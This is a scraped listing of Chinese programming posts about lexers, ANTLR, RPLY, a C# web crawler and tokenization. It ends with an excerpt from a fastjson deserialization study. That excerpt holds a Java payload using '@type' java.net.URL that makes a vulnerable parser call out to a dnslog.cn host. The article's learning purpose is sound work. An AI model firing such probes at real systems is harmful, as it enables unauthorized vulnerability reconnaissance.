lexer

C#爬虫实践

橙三吉。 提交于 2021-02-10 07:57:22
  忘了什么时候加的,iPad上的人人视频追剧了《我的天才女友》,没事的时候看了下,感觉还不错,进一步了解到原著那不勒斯四部曲,感觉视频进度有些慢,就想找找书看看,一时没找到【PS:购买实体书四十多块钱,虽然目前买得起,但是只是看看故事而不是收藏,不值得买,希望以后有机会补票,而且更习惯使用sp4看pdf或者多看多设备同步阅读进度】,不过找到了在线观看的网站,正好这一段时间有使用C#,就想着使用C#自动将内容抓取下来。断断续续的大概五六个小时的时间,终于功能上实现了。   由于没怎么研究过爬虫相关知识,不知道是否符合爬虫设计与实践的一些原则,自己做所的不过是通过webrequest抓取页面内容,然后人工分析寻找特征点,找到自己想要的内容。针对这次的任务首先通过目录抓取所有的章节以及对应的页面链接,然后分别抓取每个页面的内容,将章节和内容保存起来。目录中章节链接的提取和每个页面的内容提取都是通过观察尝试实验得到的,不知道是自己哪里设计出了问题,或者就是爬虫本身的特点,感觉很难写出通用的爬虫,很难得到通用的特征点,即使都是在线阅读站点,前端代码不一样,提取的特征都不一样,当前我是直接获取页面内容进行分析,也许会有一些成熟的库,可以直接提取所要的内容。   不管怎么说,折腾了一场,记录下来,以便以后需要的时候可以查看,而且存储在网络上可以防止丢失。 获取页面内容code: /* *

Scanner (Lexing keywords with ANTLR)

倾然丶 夕夏残阳落幕 提交于 2021-02-04 21:28:29
问题 I have been working on writing a scanner for my program and most of the tutorials online include a parser along with the scanner. It doesn't seem possible to write a lexer without writing a parser at the same time. I am only trying to generate tokens, not interpret them. I want to recognize INT tokens, float tokens, and some tokens like "begin" and "end" I am confused about how to match keywords. I unsuccessfully tried the following: KEYWORD : KEY1 | KEY2; KEY1 : {input.LT(1).getText().equals

Scanner (Lexing keywords with ANTLR)

守給你的承諾、 提交于 2021-02-04 21:27:49
问题 I have been working on writing a scanner for my program and most of the tutorials online include a parser along with the scanner. It doesn't seem possible to write a lexer without writing a parser at the same time. I am only trying to generate tokens, not interpret them. I want to recognize INT tokens, float tokens, and some tokens like "begin" and "end" I am confused about how to match keywords. I unsuccessfully tried the following: KEYWORD : KEY1 | KEY2; KEY1 : {input.LT(1).getText().equals

How to parse multiple line code using RPLY library?

一世执手 提交于 2021-02-04 08:36:45
问题 I am working on the development of a new language and I am using RPLY library for lexing and parsing purposes. Now I am stuck at getting an error when I use more than one line in the code file. here are my files:- mylexer.py from rply import LexerGenerator class Lexer(): def __init__(self): self.lexer = LexerGenerator() def _add_tokens(self): # Print self.lexer.add('PRINT', r'print') # Parenthesis self.lexer.add('OPEN_PAREN', r'\(') self.lexer.add('CLOSE_PAREN', r'\)') # Semi Colon self.lexer

C# 词法分析器(七)总结

落爺英雄遲暮 提交于 2021-02-04 07:27:32
系列导航 (一)词法分析介绍 (二)输入缓冲和代码定位 (三)正则表达式 (四)构造 NFA (五)转换 DFA (六)构造词法分析器 (七)总结 在之前的六篇文章中,我比较详细的介绍了与词法分析器相关的算法。它们都比较关注于实现的细节,感觉上可能比较凌乱,本篇就从整体上介绍一下如何定义词法分析器,以及如何实现自己的词法分析器。 第二节完整的介绍了如何定义词法分析器,可以当作一个词法分析器使用指南。如果不关心词法分析器的具体实现的话,可以只看第二节。 一、类库的改变 首先需要说明一下我对类库做的一些修改。词法分析部分的接口,与当初写《C# 词法分析器》系列时相比,已经发生了不小的改变,有必要做一下说明。 1. 词法单元的标识符 词法单元(token)最初的定义是一个 Token 结构,使用一个 int 属性作为词法单元的标识符,这也是很多词法分析器的通用做法。 但后来做语法分析的时候,感觉这样非常不方便。因为目前还不支持从定义文件生成词法分析器代码,只能在程序里面定义词法分析器。而 int 本身是不具有语义的,作为词法单元的标识符来使用,不但不方便还容易出错。 后来尝试过使用字符串作为标识符,虽然解决了语义的问题,但仍然容易出错,实现上也会复杂些(需要保存字符串字典)。 而既简单,又具有语义的解决方案,就是使用枚举了。枚举名称提供了语义,枚举值又可以转换为整数

How to fix the “multi-character literals are not allowed” error in antlr4 lexer rule?

佐手、 提交于 2021-01-28 06:04:34
问题 The rule I am trying to write is: Character : '\u0000'..'\u10FFF'; But when trying to run antlr tool against the lexer file where it is defined I get the following error: multi-character literals are not allowed in lexer sets: '\u10FFF' How to resolve this problem? 回答1: Try wrapping the multi-char literal with { and } , and use the v4 style character set [...] : Character : [\u0000-\u{10FFF}]; From https://github.com/antlr/antlr4/blob/master/doc/lexer-rules.md#lexer-rule-elements: [...] Match

Accessing tokenization of a C++ source file

纵饮孤独 提交于 2021-01-25 23:04:09
问题 My understanding is that one step of the compilation of a program (irrespective of the language, I guess) is parsing the source file into some kind of space separated tokens (this tokenization would be made by what's referred to as scanner in this answer. For instance I understand that at some point in the compilation process, a line containing x += fun(nullptr); is separated is something like x += fun ( nullptr ) ; Is this true? If so, is there a way to have access to this tokenization of a

Accessing tokenization of a C++ source file

浪子不回头ぞ 提交于 2021-01-25 23:02:49
问题 My understanding is that one step of the compilation of a program (irrespective of the language, I guess) is parsing the source file into some kind of space separated tokens (this tokenization would be made by what's referred to as scanner in this answer. For instance I understand that at some point in the compilation process, a line containing x += fun(nullptr); is separated is something like x += fun ( nullptr ) ; Is this true? If so, is there a way to have access to this tokenization of a

逆向学习 fastjson 反序列化始末

末鹿安然 提交于 2020-10-03 16:20:40
作者:summersec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言    Fastjson这款国内知名的解析json的组件,笔者在此就不多介绍,网络上有很多分析学习fastjson反序列化漏洞文章。笔者在此以一种全新角度从分析payload构造角度出发,逆向学习分析fastjson反序列化漏洞始末。 ps:漏洞学习环境以代码均在上传 Github项目 。 初窥Payload    下面是一段最简单 Fastjson的版本号反序列化--URLDNS 代码,观察发现可以提出一个问题 @type 作用? import com.alibaba.fastjson.JSON; public class urldns { public static void main(String[] args) { // dnslog平台网站:http://www.dnslog.cn/ String payload = "{{\"@type\":\"java.net.URL\",\"val\"" + ":\"http://h2a6yj.dnslog.cn\"}:\"summer\"}"; JSON.parse(payload); } } @type的作用    下面是一段实验代码,帮助理解分析 @type 的由来。